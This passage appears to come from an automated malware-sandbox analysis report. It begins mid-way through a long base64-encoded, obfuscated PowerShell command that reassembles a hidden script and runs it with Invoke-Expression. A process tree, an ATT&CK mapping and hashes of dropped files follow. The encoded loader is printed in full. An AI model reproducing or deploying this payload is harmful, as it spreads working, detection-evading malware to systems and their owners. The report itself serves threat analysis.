UAG8AcgBjAGgAdgBBAGEAYgBmAG8AMQBJAG4AdABlAHIALABVAG4AZABlAHIAaQBQAHIAaQBuAHMAbgBVAG4AZABpAGcAdABBAGYAZABtAHAAIABhAG0AeQBsAHUAdgBPAG0AcABsAGEAMgBEAGUAcABhAHIAKQBLAGEAbAB2AG4AOwAKAEgAZQBuAGsAbwBbAFIAZQB2AGEAbgBEAEoAbwBsAGwAaQBsAEUAbABlAGMAdABsAEkAbgB0AGUAcgBJAE0AdQBzAHQAaQBtAHMAbwB1AG4AZABwAFMAYwBvAHIAcABvAEYAbwByAGYAaQByAEwAdQBuAGcAZQB0AFUAbgBxAHUAZQAoAE8AdgBlAHIAZQAiAFUAZABkAHIAYQBrAE0AbwBkAHIAZQBlAG8AawBrAHUAbAByAE0AYQBuAG4AcwBuAEwAaQBsAGwAaQBlAEYAbABvAHcAcwBsAEQAaQByAGUAYwAzAEQAdQBtAGIAYgAyAEMAYQBsAGEAbQAiAEQAZQBrAG8AZAApAFQAdQBiAGUAbgBdAEgAaQBzAHQAbwBwAEEAcgBiAGUAagB1AEYAbwByAHIAYQBiAFUAbgBiAHUAZABsAGYAYQBtAGkAbABpAGsAbwBtAG0AdQBjAE0AZQBnAHIAaQAgAFkAZQBsAGQAcgBzAFMAdABhAGcAaQB0AEwAaQBuAGkAZQBhAFMAbgBvAGgAYQB0AEEAdgBsAGUAZABpAEMAbwB3AHIAeQBjAFQAaQBsAG8AdgAgAEUAagBlAG4AZABlAFMAeQBkAHkAZQB4AFQAeQBkAGUAdQB0AFQAZQBtAGEAbABlAFMAcABvAGwAaQByAE8AegBvAG4AaQBuAFUAbgBmAG8AcgAgAFMAdABhAHYAZQBpAFQAZQBhAGMAYQBuAEEAbgBrAHkAbAB0AEYAaQBzAHQAcgAgAEgAbwBkAGcAawBGAE0AYQB4AGkAZgBpAFYAbwB5AGEAZwBuAGIAcgBuAGUAdgBkAFAAZQBsAGUAbABGAEUAcgBpAGMAaABpAEsAdgBpAHQAdAByAEkAbgBjAHUAbQBzAE8AYwBjAHUAbAB0AEcAcgBhAHQAZQBDAEcAdQBhAGMAaQBoAFMAYwBoAHcAZQBhAFUAYwBlAG4AdABuAFIAdgBmAHUAbABnAFMAaQBkAGUAdwBlAEYAaQBsAG0AbwBOAEYAZABlAG0AaQBvAEsAcgB1AHMAaAB0AEEAYwB0AGkAdgBpAEgAaQBuAGsAbgBmAEEAdgBvAGMAYQBpAEMAYQBuAGMAZQBjAE4AbwBuAGUAZABhAEcAYQBzAGIAcgB0AE8AeAB5AGwAdQBpAEkAbgBkAHQAcgBvAFQAZQBwAGUAZgBuAFMAcABpAHIAbwAoAEQAaQBhAHQAaABpAEkAbgBmAG8AcgBuAFcAaQBsAGsAaQB0AE0AZQBkAHYAaQAgAEkAcABzAGkAbABBAE4AeQB0AHQAZQBsAGgAYQByAHQAbABwAEkAbgB0AGUAcgBlAEsAbwBiAGIAZQB2AEsAYQBwAGwAYQBpAEoAdQBtAHAAaQAsAFQAcgBvAGUAbABpAEoAYQB2AGEAbgBuAFYAZQBsAHUAZAB0AEgAbwBsAHAAZQAgAFIAZQBjAGUAaQBQAE0AYQBuAGcAbwBhAE4AbwBuAHQAcgB0AGgAagBkAGUAcABvAEcAZQBuAG8AcABpAEwAdQByAGkAZAAsAFYAaQBsAGoAZQBpAEcAbABhAHMAYgBuAEsAbwBsAGgAbwB0AEQAYQBnAHMAcAAgAEQAcgBhAG0AYQBFAEsAbABhAHMAcwByAHMAbQBhAHIAYQBvAEIAcgBvAGQAZQB0AEgAYQBsAHYAZgApAFYAaQBjAGEAaQA7AAoAYQBwAHAAZQBsAFsAUgBlAHEAdQBpAEQARQBuAGQAbwBtAGwARABhAHQAYQB0AGwASABvAGYAdABlAEkAZABvAG0AcwBtAG0AQwBhAGwAbABpAHAAVABhAHUAdABpAG8AQgB1AGUAbgBzAHIAcgBsAGkAZwBlAHQASQBuAG0AZQBhACgATAB1AGYAdABhACIASQBtAHAAYQB0AGsARABlAGMAbwBtAGUATgBvAG4AYQBkAHIAUwB0AG8AcABwAG4ARAByAGkAZgB0AGUAVABpAGQAcwBzAGwAQgBpAG4AZABlADMASQBuAGQAcgB5ADIAWgBpAG8AbgBpACIARQBuAGMAaABhACkAdABpAGQAaQBlAF0AcwB0AG8AbwBsAHAAYQBjAG8AbABvAHUAUwBhAGwAcABlAGIAVABpAGwAbwByAGwAdAByAGUAYQB0AGkAQQBmAHMAdAB0AGMARQBqAGUAbgBkACAARABpAHMAdAByAHMAQwBlAG0AZQBuAHQAQgByAG4AZQBnAGEAQQBuAG8AeAB5AHQAUwB2AG0AbQBlAGkAQQBuAGkAcwBiAGMAUwBtAGEAbABmACAAQgBlAG4AZQBmAGUAQwBvAGQAaQBmAHgAUwBwAGUAZQBkAHQAWABkAGkAcwBrAGUAVQBuAGYAaQBzAHIAcwBpAGcAdABlAG4AUABhAHIAawBlACAASQBuAGQAYgBlAGkAVQBsAGkAdgBzAG4ATQBhAHIAcwBrAHQAcgBpAGcAaAB0ACAAcgBlAGEAYwB0AEQAUwBtAGEAZwBlAGUAVAByAGUAcwB0AHYASQBuAHQAZQByAGkAUwBuAHUAcgByAGMASwBsAGEAdQBzAGUATQBvAG4AYQBjAEkARQByAGEAbgB0AG8ATABlAGcAYQBsAEMAYgByAGQAZgByAG8AQgBvAG4AbgB5AG4AUgBlAGsAbwBuAHQATgBhAHQAdQByAHIASQBuAGQAdABhAG8AUwBhAG4AZABpAGwARAB5AHIAZQBrACgAQwBjAGsAdwBvAGkAVABoAG8AcgBkAG4AUwB0AHIAdQBkAHQAQgByAGEAdwBuACAARABhAHQAYQBiAEYATgBvAG4AYwBvAHUARQByAG4AYQB3AGwAUwB0AGUAaQByACwATwBpAGwAYwBvAGkAcwBvAGQAYQBrAG4AUwB0AHIAawBsAHQAUABhAHQAZQBuACAAVABzAGUAbQBpAEUAUwB1AGIAcABoAHMAVAByAGEAawB0AGsARQBuAGMAYQB1ADIATwBiAGwAaQB2ADQARQBtAHAAaQByADkARABlAHMAcwBlACwAbQBhAGoAZQBzAGkARQBxAHUAaQBkAG4AYwBhAGIAcgBlAHQARABlAHYAZQBsACAAUwBwAHIAbgBnAEcAQwBlAGwAZQBiAGkAUABvAHMAcwBpAHQARwBvAHMAcwBpACwAaABlAGQAZQBzAGkAUABhAHQAbwBsAG4AcwBjAGEAbgBzAHQAVABlAHMAdABkACAAQQBiAGQAaQBrAHIAQwBvAGwAbABvAGEARQBrAHMAYQBtAG0AVQBuAGQAZQByACwAQgBvAHMAawBlAGkAQwBvAGwAdQBtAG4AUwBrAG8AdgBkAHQAQgBqAGUAcgBnACAAQwBvAG4AbgBpAEgAVQBuAGQAZQByAGUAcwBhAGwAdgBpAHIAVQBkAHQAcgByACwAVABoAHkAcgBvAGkAUgBhAGIAdQBsAG4ATQB1AGMAZQBkAHQASQBuAGYAcgBhACAATgBhAHIAYwBpAGEAZABlAG4AdQBkAGwAUwB0AGkAbQBhAGsAcwBhAHQAcwBhACwAUwBvAHUAYQByAGkARgBlAGQAdABlAG4AUAByAG8AdgBvAHQARABlAGwAcABoACAAUgBvAG8AZgBoAEgAUAByAGUAcwBwAHkARwBlAG4AZwBhAGwAVABoAHUAbgBkACwAUwBsAGkAcABzAGkAbgBvAG4AZABpAG4AUwBvAGwAdgBlAHQAUABlAHQAYQBzACAAVABhAHMAdABhAFMAUgBzAHQAaQB2AHQARQBsAHMAawBlAGEAUwBhAGsAcwBlAGQAUwBlAHIAdgBpAHMARQBuAGcAbABlACkAcwBpAGQAZQBuADsACgBzAGUAbQBlAHMAWwBBAHIAYgBlAGoARABBAG0AdABzAGcAbABCAHIAbgBkAGYAbABEAGEAdABhAGIASQBIAGEAcgByAGkAbQBWAGUAbgBvAG0AcABSAHUAbQBmAGEAbwBWAGUAbABzAG0AcgBJAHIAZQB0AHQAdABCAGUAZABhAGEAKABqAHUAbABpAGQAIgBOAG8AbgBzAGUAawBCAGkAcwBoAG8AZQBzAGsAYQByAHAAcgBmAG8AcgBiAGkAbgBQAHIAZQBhAGQAZQBWAGEAbgBkAGkAbABCAGUAZgByAGkAMwBrAHUAbgBkAGUAMgBKAHUAaQBzAGUAIgBUAGEAYwBhAG0AKQBEAHIAdQBuAGsAXQBSAGUAbABlAHYAcABVAHMAdQByAHAAdQBWAGkAawBpAG4AYgBLAHUAZwBsAGUAbABCAGkAbABsAGUAaQBPAHYAZQByAGUAYwBEAGUAYwByAGUAIAByAGUAcABsAGkAcwBEAHUAZwBwAHUAdABUAGkAbABwAGEAYQBIAGUAagBkAGkAdABSAG8AcwBlAG4AaQBUAHkAcgBhAG4AYwBSAGUAYwBvAHIAIABCAHIAYQBuAGsAZQBSAGEAZwBsAGEAeABCAGEAYwBjAGEAdABQAGEAbABlAHIAZQBGAG8AcgBzAGwAcgBCAGUAYgB1AGQAbgByAGUAYQBiAHIAIABVAG4AYwBsAGUAaQBTAHAAZQByAG0AbgBVAG4AcAByAGUAdABTAGMAbABlAHIAIAB0AHIAYQBzAHMAUwBBAGMAZQB0AHkAZQBEAGUAbgB0AG4AdABBAG4AdABpAGwARQBVAG4AYwB1AHIAcgBLAG8AbgBnAHIAcgBTAGsAcgBpAHYAbwBBAGYAdABlAG4AcgBBAHUAdABvAHAATQBVAGwAeQBrAGsAbwBTAHAAaQBsAGQAZABNAHkAcgBtAGUAZQBJAGMAaABpAGIAKABNAGkAbgB1AHQAaQBSAHUAZABsAG8AbgBlAHIAaQBjAGgAdABHAHIAaQBtAGEAIABDAG8AZQBuAGUAQgBVAG4AdAByAGEAbwBCAGkAcwBvAG4AbQBNAGUAbgBlAGwAYgBBAGYAawBvAGwAYQBLAGEAbgBkAGUAKQBQAHIAZQBnAGcAOwAKAEoAYQBnAGUAcgBbAEwAYQBuAGQAbABEAEUAZgB0AGUAcgBsAFMAZQBrAHIAZQBsAFIAZQBrAHIAdABJAFIAdQBtAG0AaQBtAFMAawBpAGYAdABwAFIAZQBuAGQAZQBvAFMAZQBsAHYAcwByAEkAbABkAGYAdQB0AEMAbwBtAG0AZQAoAE4AbwBuAGkAbgAiAEkAbgBjAHUAbAB3AFMAcAByAGkAdABpAE8AdgBlAHIAZgBuAFcAZQBsAGwAaABzAEoAZQBuAGwAeQBwAFQAYQBiAGUAbABvAFMAeQBuAGUAYwBvAEgAdQBzAGgAYQBsAEYAbwByAGIAcgAuAFUAbgBkAGUAcgBkAFUAYQBwAHAAZQByAHAAdQBzAHoAdAB2AFYAYQByAGkAYQAiAE4AcgBiAGkAbAApAEIAdQBsAGwAZQBdAE8AbQBmAG8AcgBwAEIAYQBhAG4AZAB1AEIAbABhAGUAbQBiAHMAawBpAG4AbQBsAFQAbwB0AGEAbABpAFQAZQBnAG4AZQBjAEgAaQBwAHAAbwAgAEkAbgBkAG0AZQBzAEgAagBlAG0AbQB0AEYAbwByAGwAZgBhAEgAYQBuAGcAYQB0AEkAbgBzAHUAcABpAEIAdQBsAGwAZgBjAFAAcgBlAHMAcwAgAFMAbwBsAGQAaQBlAEQAcgBhAGcAZwB4AEgAdQByAHQAbAB0AEMAaABsAG8AcgBlAEQAeQBrAGsAZQByAEgAbwBtAG8AZQBuAEkAbQBwAGwAZQAgAEwAbQBtAGUAbABpAE0AaQBkAHIAYQBuAE8AcgBrAGUAcgB0AFcAZQBhAHMAZQAgAEsAaQBvAG4AZQBHAFcAaQBlAG4AZQBlAFMAawBsAHYAZQB0AE0AYQBjAGgAaQBQAEYAbAB1AHAAaAByAEIAbwB1AGcAYQBpAE8AcgBkAGYAbwBuAFMAawBhAGEAcgB0AEwAeQBuAGMAaABlAFMAawBpAGIAcwByAHMAbgBlAHIAdAAoAE0AZQByAG8AaQBpAFIAaABvAGUAYwBuAEgAZQBsAHYAZQB0AFAAYQByAGkAcwAgAFMAcAB5AGQAcwBKAHAAbABpAGcAdABhAEkAZABoAGkAcwBiAEMAZQByAGEAbQBvAFUAdgBpAGwAbAByAFAAbwBzAHMAZQBhAGMAbABpAG0AYgAsAFMAeQBzAHQAZQBpAFQAdgBhAG4AZwBuAEMAZQBxAGMAYQB0AFMAbABhAGIAYgAgAEUAdQBjAG8AcABSAE8AdgBlAHIAbQBlAFAAcgBvAHQAbwB2AEUAcgBhAGQAaQAsAEgAbwBzAHQAYQBpAEsAaQBsAHQAcwBuAEMAaABpAGEAcwB0AEgAYQBtAG0AZQAgAFMAaQBtAG8AbgBIAEwAZAByAGUAbwBhAFMAcABpAGMAZQB1AFMAawByAGkAdgBuAEYAcgBhAGcAaQAsAFAAbwBsAGkAdABpAE8AdgBlAHIAbQBuAFkAZQBtAGUAbgB0AEEAbgBkAGUAagAgAE4AdgBuAGkAbgBVAEQAaQBwAGgAdABkAFYAYQByAGkAYwByAEMAbwB3AHkAagBhAEgAbwBuAG8AcgBhAE8AbQBmAGEAdgAsAEUAawBzAGUAZwBpAEkAbgBkAHAAYQBuAFQAcgBvAHAAaAB0AEQAdQB0AHkAdQAgAEkAbgBkAGUAbQBkAFIAYQBkAGUAcgBlAEIAdQBzAGkAZQB2AFMAdABhAHYAcgBlAEIAdQBrAHMAZQBsAEwAZQBnAGEAcgApAFYAZQByAGEAdAA7AAoAZQBsAGwAaQBwAFsASABvAGEAcgBpAEQAVAByAGkAZABlAGwATQBhAGMAcgBvAGwAUABhAHIAZQByAEkAUAB1AHIAaQB0AG0ATABhAGMAdABhAHAARgByAGEAdgBlAG8AUgBlAGMAcgBhAHIAUwBrAG8AdABwAHQATQBhAHIAZwBpACgASQBzAG8AZwBsACIAVgBvAHQAYQBsAHUAVQBuAGQAZQByAHMAVQBuAGQAZQByAGUARwBlAG4AZQByAHIAcwBrAHIAdQBiADMARgBlAHIAbwBjADIAUABvAHMAdABnACIAUwBvAHIAZABhACkARgBhAG0AaQBsAF0AZwBhAHMAdABzAHAAQwB1AGwAdAB1AHUAQgByAGUAZQBjAGIAVABpAGwAYgBlAGwATwBwAGIAeQBnAGkARwBoAGEAcwB0AGMAUABsAGEAZwBpACAARgBvAHIAbQBrAHMARQBzAG8AdABlAHQAYQB0AG8AYwBpAGEAUwBjAGgAbwBsAHQARABlAHYAaQBkAGkAQQByAG0AYQBnAGMARABlAG4AYQB0ACAARABpAHMAdAByAGUARgBvAHIAcABsAHgAUwBwAGkAcgBlAHQAQwBhAHIAaQBiAGUARABpAHMAdABhAHIAaABlAG4AbABlAG4AUwBuAGUAawBrACAARQBsAGUAYwB0AGkASABhAGwAdgBlAG4AUAByAG8AdABlAHQAVQBuAGMAbwBuACAAQgBlAHYAaQBkAEQASABlAGEAZABtAGUARgByAGkAbQByAGYAQgBhAGwAbABlAEQAQgBpAGcAbgBvAGwAUgBlAHMAcABpAGcAVABvAGkAYgBvAFAAUgBlAHYAbwBrAHIATQBpAHMAYwBoAG8AcwBhAG0AbABlAGMAVABlAGwAZQBmACgAUwBvAGQAYQB2AGkAcAB1AGUAYgBsAG4ATQB1AGwAdABpAHQAVgBpAGQAZQByACAAVQBiAGUAaABhAEsAdABvAG0AYgBhAG8ASABhAGQAcwBrAGIAVAByAGkAYQBzACwARwBhAHIAbgBlAGkASwBvAGEAcwBhAG4AUgBhAGEAZABnAHQAVABvAHQAYQBsACAAVQBuAGQAZQByAEEAQQBlAHMAdABoAG4ARAByAGUAdABzAHMAQQBiAG8AbQBhAHQAVQBuAGMAbwBuAGkAQwBlAHIAYgBlACwARgBhAGcAZQBsAGkAQwBhAG0AaQBzAG4AUABoAGkAbABhAHQARwBhAGwAbABlACAARgBpAGcAcgBlAE8AZgBkAGUAZwBvAHAATwBwAHQAaQBtAHMAQQBzAGYAYQBsAGkAUwB1AG4AZABoACwAUwBsAGIAZQB0AGkATwB2AGUAcgBoAG4ARwBhAGwAZwBlAHQAdgBlAHIAdABpACAAVABhAHAAYQBkAHIARABlAG0AaQBtAGUAQgBsAGUAbgBuAG4AQQBiAGIAbwB0AHUAcAByAGkAZABpACkASwBqAGUAbABsADsACgBJAHIAcgBlAHYAfQAKAEcAZQBqAHIAcwAiAFMAcABhAHQAaQBAAAoAcwBlAGsAdQBuACQATABlAGcAZQBtAEkAUwB0AGEAdABpAG4AYgBlAGwAbABpAHQARABlAGMAbABpAGUAQQBmAGsAcgBpAHIAUwB2AGUAcwBrAG4ASgBhAG0AYgBvADMAUwB5AG0AcABhAD0ASwBtAHAAZQB2AFsARQB4AHAAbABhAEkASABvAHYAZQBkAG4AcABzAHkAawBvAHQASwBsAG8AcgBlAGUASAB1AHMAbABnAHIAVAByAG8AYwBoAG4ASQBuAGQAcgBpADEAVABoAGUAcgBtAF0AUABpAG4AbgBpADoAQgB1AHMAcwBlADoASABqAHIAbgBlAFYARgBvAHIAaABhAGkATwB1AHQAaABpAHIAUgBpAGIAYgBlAHQARgBpAGwAbwBsAHUARgBsAGEAbgBrAGEARwByAGEAdgBzAGwATgBlAHQAdABlAEEAVQBuAGQAdgBpAGwATgBvAG4AYQByAGwAUAByAGUAYwBpAG8AUwBjAG8AbABlAGMAUgBpAGcAaABvACgARgBvAHIAcwB0ADAASwBvAG4AdABpACwATQBlAG4AbgBlADEASQBuAGoAdQByADAARQBtAGEAbgBjADQAUwBpAGwAaQBxADgAUAByAG8AdABoADUARgBsAGEAcwBrADcAUwBwAGkAbABsADYAQwBlAG4AdABlACwAbABlAGoAbABpADEAdQBvAHAAZAByADIASwBvAG8AcgBkADIAVgBpAG4AcgBkADgAUgBlAG4AdABlADgARgBpAGwAbQB1ACwARABlAGwAcwB0ADYAQgBhAGgAYQBtADQARgBvAHIAZQBxACkACgBVAG4AcABlAHIAJABQAHUAcgBpAHQAUgBTAGkAZABlAHIAaQBHAGEAbABsAGUAZwBTAHQAZQByAGUAcwBBAHIAYQBiAGUAdABTAGsAbwBsAGUAZQBWAHIAZABpAG8AbABJAG4AcwBlAG0AZQBRAHUAbwBpAGwAPQBDAGEAcABlAGEAKABTAGsAaQBsAGkARwBOAHkAcwBnAGUAZQBGAHIAYQB1AGwAdABNAGEAawBlAGQALQB2AGEAcgB2AGkASQBQAGgAeQB0AG8AdABVAHMAbABlAHEAZQBSAGUAYwByAGkAbQBQAGkAZQB0AGUAUABFAG4AZQB1AGwAcgBpAG4AawBsAHUAbwBDAG8AcgByAGUAcABJAG0AcABsAG8AZQBLAGUAagBzAGUAcgBUAHkAZABuAGkAdABGAGwAYQBkAHQAeQBBAHUAZABpAG8AIAB1AG4AZABlAHIALQBUAHIAZQBrAGsAUABCAHIAYQBzAGkAYQBEAGoAdQByAHMAdABGAGwAbABlAHMAaABGAG8AcgBuAGUAIABBAHAAdABlAHIAIgBBAGwAYgBvAGMASABOAG8AbgBjAGgASwBVAG4AZABlAHIAQwBOAGUAdQByAGEAVQBlAHYAaQBsAHcAOgBTAHYAcgB2AGcAXABUAGkAbgBnAGwAUwB0AGUAbABlAGYAbwBDAG8AbQBwAGEAZgBBAHQAeQBwAHkAdABLAHIAeQBwAHQAdwBVAG4AYwB1AHIAYQBGAHUAbABkAGIAcgBEAGQAaQBzAGMAZQBUAHIAYQB1AG0AXABTAGUAbABlAG4AVABFAHUAcgBvAGsAbwBFAHQAdwBlAGUAawBQAGEAbgBkAGkAcgBCAGEAZwBnAHIAbwBSAGUAYwBlAHAAbgBTAHAAaQBsAGQAZQBFAHAAaQBzAGMAcgBlAHgAYQBjAHQAcwBCAHIAbgBlAHIAZgB1AG4AbgBlAGcAIgBPAGIAcwBlAHIAKQBOAGUAYQByAHMALgBPAG0AbgBpAGYAUwBTAHcAYQBiAGIAdABUAGUAbABlAHMAcgBNAGkAcwBnAGEAYQBQAG8AZABvAHAAZgBMAHkAYgBrAGsAZgBTAHAAZQBlAGQAZQAKAEEAZwBuAGEAdAAkAE0AYQB0AGgAaQBMAEEAbgB0AGkAcABhAFQAYQBuAHoAYQB1AEsAaQBsAGQAZQBnAEwAZQB1AGsAYQBoAFcAbwBvAGQAcgBhAFIAZQB3AGkAbgBiAHUAbAB5AGsAawAgAFQAZQBnAG4AcwA9AEcAdQBpAGwAbAAgAEMAbABlAHIAZwBbAE4AbwBuAGQAaQBTAFAAbwByAHQAZQB5AEwAbwBhAHQAaABzAFMAYQBtAG0AZQB0AE4AbwBuAHQAZQBlAFAAYQByAGEAbABtAFAAZQBjAGEAbgAuAFIAdQBsAGwAZQBDAGYAbwByAGwAaQBvAEsAbwBuAGQAZQBuAFMAdQBwAGUAcgB2AEwAYQBrAHkAZABlAEUAbABlAGMAYQByAFIAZQB3AGEAcgB0AFAAcgBpAG8AcgBdAE8AdgBlAHIAZwA6AEEAdAB0AHIAaQA6AFMAbABpAHAAdABGAFQAcgBzAGsAZQByAEUAbgByAG8AbwBvAHMAZQByAHYAaQBtAE8AdABhAHIAeQBCAEEAbABlAGsAcwBhAEEAYQBnAHIAZQBzAFIAaQBuAGcAaQBlAEYAdQBuAGQAYQA2AE0AdQBzAGUAdQA0AEQAZQB0AGEAaQBTAFAAYQBzAHMAaQB0AEEAZgBzAGsAYQByAEwAYQBkAGQAZQBpAFYAYQBuAGQAcABuAE0AYQBkAHIAZQBnAEwAeQByAGUAcgAoAEsAZQBtAG8AdAAkAE8AdgBlAHIAcABSAEIAcgBpAGwAbABpAE0AaQBjAHIAbwBnAEgAYQBuAGQAZQBzAEgAYQB2AHIAbgB0AEIAdQB0AGkAawBlAEkAbgBkAHUAcwBsAEcAZQB5AHMAZQBlAEUAawBzAGEAbQApAAoAUwBhAGwAZwBzAFsARgByAGkAcwB0AFMARgBpAHIAYQBhAHkASgBlAHQAdABlAHMAUwBuAGUAcgBwAHQAVABpAG0AZQBrAGUAUwBvAHUAdABoAG0AUwBwAGwAZQBuAC4AUABoAG8AYwBlAFIAUwB0AHYAYgByAHUAQgBpAGwAdABpAG4ASwB1AHIAdgBlAHQARgBpAGQAdQBjAGkARgBvAHIAawBvAG0ARgBpAHMAawBlAGUARwBpAGcAYQBzAC4ASwBhAG4AaQBuAEkAUwBlAG4AZwBlAG4AUgBlAHYAaQBjAHQARAB5AHIAbABnAGUAQQBuAGsAeQBsAHIAUAByAGUAcABvAG8AUwBwAGwAYQBuAHAAdABvAGcAZQBkAFMAZwByAHUAbgBkAGUAVABpAGQAcwBvAHIAQwBlAGwAbAB1AHYAUAB1AGwAZQBnAGkAQgB1AGcAbgBlAGMAQQBmAHMAdABlAGUASABlAG4AbABnAHMAUgBlAGEAbgBlAC4ATgBhAHYAbABlAE0ATQB1AGQAcwBsAGEAUgBhAGYAdABlAHIAUwB1AHQAdABlAHMAUwBjAHkAdABoAGgARwByAGUAdABlAGEAQgBlAGYAcgBhAGwASgBlAG4AdgByAF0AVABoAGkAZQBmADoAQwBoAGkAdABpADoAbABhAG4AYwBlAEMASwBpAHQAbgBhAG8AUwB0AHIAbwBrAHAAQQByAGEAYgBpAHkAQgBpAGwAbABlACgAQwBsAGEAdgBlACQAQQBvAHUAZQBsAEwARQB5AGUAYgByAGEARAB5AHMAYwByAHUAQgByAHUAZwB0AGcARAB5AHMAdABvAGgAUABhAGwAdQBkAGEAQgB1AHQAaQBrAGIAQgByAGUAcABpACwAQQBjAGEAbAB5ACAAQQBpAHMAdABvADAAYgB1AHQAYwBoACwAUgBlAGMAZQBuACAARwBhAGYAZgBlACAAQQBmAHYAYQBlACQARgBvAHIAcwBhAEkARwByAGEAcABlAG4AbwBwAGEAcgBiAHQAVQBuAGcAYQByAGUAVQBtAGIAcgBlAHIAQwBsAGEAcwBwAG4AVQByAGkAbQBlADMARgBqAGUAcgBkACwAcwB0AGEAdABzACAAUwBwAGwAYQBzACQATABhAHIAeQBuAEwAQQBsAGYAbwBuAGEARwBhAHcAbQBzAHUAUgBhAG4AZwBsAGcATwBjAGgAbABvAGgAQgBlAGsAZQBuAGEAUABvAGwAaQB0AGIAWgBlAGEAbABvAC4AZQBrAHMAbwByAGMASwBhAGwAZQBuAG8AUwBuAHUAZQBkAHUAcwB3AGkAdABoAG4AQwByAG8AdwBuAHQAUwBwAGkAawBlACkARABvAHcAcwBlADsACgBBAGYAZgByAG8AWwBCAGUAdABvAG4ASQBDAG8AbQBtAGEAbgBQAGwAaQBzAHMAdABIAGUAdQByAGkAZQBDAGEAYgBvAGMAcgBTAHAAaQBsAGsAbgBPAHAAYgB5AGcAMQBOAG8AdQBwAHAAXQBNAG8AcgB0AGcAOgBTAGMAYQB2AGUAOgBDAGEAbgBkAGwARQBEAGUAawBvAHIAbgBBAHMAZQBjAHIAdQBPAG0AcwB0AGIAbQBMAGUAdABhAHIAUwBBAGQAZwBhAG4AeQBCAGUAdAByAHkAcwBUAGEAawBlAHIAdABVAG4AZwBkAG8AZQBWAG8AdwBlAGwAbQBQAHIAaQBjAGkATAB0AG8AdABhAGwAbwBVAGQAbABlAGQAYwBGAGwAbwBwAHAAYQBGAG8AbABrAGUAbABIAG8AbQBlAHQAZQBQAGUAbgBzAGkAcwBTAGQAZQBsAGkAQQBPAHAAZQByAGUAKABPAHYAZQByAGUAJABOAG8AbgBjAHIASQBBAG4AbABnAHMAbgBFAGYAZQB1AHMAdAB1AG4AdAByAGEAZQBBAGYAZABvAGUAcgBpAHMAbwBsAGEAbgBHAGEAcgB2AGUAMwBTAHEAcgB0AG0ALABEAGUAbgBzAGkAIABDAGgAZQB2AHIAMABMAGEAbgBkAHMAKQBTAGkAbABpAGsAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABGAGkAcgBlAGYAaQAuAEwAZQBuAGcAdABoAC0AMQA7ACAAJABpACsAPQAoADUAKwAxACkAKQANAAoAewANAAoACQANAAoACQAkAE4AYQBiAG8AYgB5AGUAIAA9ACAAJABOAGEAYgBvAGIAeQBlACAAKwAgACQARgBpAHIAZQBmAGkALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABGAGkAcgBlAGYAaQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABOAGEAYgBvAGIAeQBlACAAPQAgACQATgBhAGIAbwBiAHkAZQAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAE4AYQBiAG8AYgB5AGUADQAKAA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zpqvmsyt.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB9A0.tmp"
      4⤵
      PID:1816

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB9A1.tmp

Filesize
1KB

MD5
2b039a44676fff7d1e980fb11728af51

SHA1
0d3aaa92ea984311d7497a1b09a8c397cdd93b40

SHA256
ce83c07bac04a4418d97466899eb9fd6c99948fccedd1020c5cc553aad3eaeef

SHA512
9ef88261c9dd41a8b0385ca5ac2a499b11c2311610bae5a6ecc8f471cf76044b9c86e23386af702493368dd7bbe0412427d86b1fe27bcf5fa8d940a604faaa15

Download Submit
C:\Users\Admin\AppData\Local\Temp\zpqvmsyt.dll

Filesize
4KB

MD5
84647926d67a8b156af92a0949744d53

SHA1
dbb2143817a10524de47cea58d022744f7e23f2a

SHA256
98e3d0fce6567cf78f79114d82a215f75e5ad984f57c05b9281ba4b09b3c94ba

SHA512
d08994431f5fa72938c86f30e4c2bd9b7ad5f2aab53b3108f6b092acbb592f69ee84d7d9025c6f7dbbcfa76ff68a47c79adf3117df1128f0a78c0ff52dd65cfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\zpqvmsyt.pdb

Filesize
7KB

MD5
202c7381a29fa1daac414f506327497d

SHA1
2e508bd320252798959340ca3d727e3bd26667c1

SHA256
d1ed7dd50e7646ebf65774532d625a42b5e3b5274561f5887de1c6dd6ab14b1f

SHA512
093ac04205331c13ed9c48b4557e06a2d98bba4e5a090c0fe26539ffc21efe0c5367c69a5563495edb4fb1d69cbb7b4b1559f8f7e49b0360baa24a37531c7346

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB9A0.tmp

Filesize
652B

MD5
f4e87d6c8ce76d52d2b6e30aeb4d5690

SHA1
a847c6bb46a0402f2c52b232ea023daf4f321009

SHA256
5cbf3857e3d9e35e62929c4f64945b9285295b050355d5e2a619fb8099938acd

SHA512
1104eb12690bd79def6e4a573248d1cfe4d3733804f0c57e8c2ab41cf3318079f37fd8f3c0432777fc17727ce4d1a36580c546b076dd30b7575f67bee10e7b58

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zpqvmsyt.0.cs

Filesize
1KB

MD5
89695310a0fad26ce505afb21b54ca20

SHA1
3a221bdedd69ee681f8bebb55e5506b2fc4a4577

